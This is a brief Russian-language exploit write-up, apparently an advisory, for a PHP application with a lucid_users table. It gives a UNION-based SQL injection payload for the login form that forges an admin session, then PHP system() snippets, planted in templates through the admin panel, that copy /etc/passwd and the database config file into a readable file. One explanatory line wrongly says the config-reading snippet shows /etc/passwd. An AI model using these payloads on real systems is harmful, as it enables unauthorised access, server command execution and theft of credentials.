1) Если magic quotes выключен, то возможна SQL-инъекция:
Инъекция вводится через форму входа:
login: 'UNION(SELECT'1','admin','admin','FAKE hotmail.com','d41d8cd98f00b204e9800998ecf8427e','1')/*
pass: [пустой]
Примечание: «login» без пробелов
Запрос, приходящий из поля «login»:
SELECT * FROM lucid_users WHERE name=''UNION(SELECT'1','admin','admin','FAKE <at>
hotmail.com','d41d8cd98f00b204e9800998ecf8427e','1')/*'
2) После входа в систему администрирования можно редактировать шаблоны и
вставить в них код, например:
<?php error_reporting(0); system('cat /etc/passwd > temp.txt'); ?>
Чтобы увидеть файл /etc/passwd, можно вставить такой код:
<?php error_reporting(0); system('cat dBConfig.php > temp.txt'); ?>
